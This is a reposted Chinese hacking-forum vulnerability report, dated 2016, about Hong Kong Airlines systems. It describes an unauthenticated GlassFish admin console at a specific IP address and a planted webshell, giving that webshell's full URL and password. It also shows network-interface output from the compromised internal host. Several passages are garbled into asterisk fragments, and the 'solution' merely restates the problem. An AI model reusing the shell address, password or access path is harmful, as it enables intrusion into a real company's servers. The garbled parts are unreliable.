记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

香港航空某系统GlassFish后台未授权访问/已getshell/涉及多个系统/内网环境

2016-05-09 14:45

1.http://**.**.**/cas-server/login_
*****697a33a1201138dbd4f8.png&qu*****
*****�未授�*****
2.://**.**.**//119.147.84.140:4848/不需要验证直接跳转glassfish后台_
*****e9c5de6e05ec4e137e01.png&qu*****
**********
*****ns 部署*****
**********
*****938593c7a8e2ab31f44d.png&qu*****
**********
*****��署了��*****
*****b, webservices] Lau*****
*****ces] Launch | *****
*****rvices] Launch *****
*****de&g*****
**********
*****地*****
3.://**.**.**//119.147.84.140:8080/is/index.jsp
密码023

ifconfig -a内网环境
eth0      Link encap:Ethernet  HWaddr 00:0C:29:A8:A6:54 
          inet addr:192.168.0.140  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fea8:a654/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37947223 errors:0 dropped:0 overruns:0 frame:0
          TX packets:42449433 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:15347581925 (14.2 GiB)  TX bytes:10272660128 (9.5 GiB)
eth1      Link encap:Ethernet  HWaddr 00:0C:29:A8:A6:5E 
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
eth2      Link encap:Ethernet  HWaddr 00:0C:29:A8:A6:68 
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:15370265 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15370265 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9442953422 (8.7 GiB)  TX bytes:9442953422 (8.7 GiB)
shell地址http://119.147.84.140:8080/is/index.jsp密码023
解决方案:
未授权访问 getshell
 

知识来源: www.2cto.com/Article/201605/506834.html

阅读:84393 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“香港航空某系统GlassFish后台未授权访问/已getshell/涉及多个系统/内网环境”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云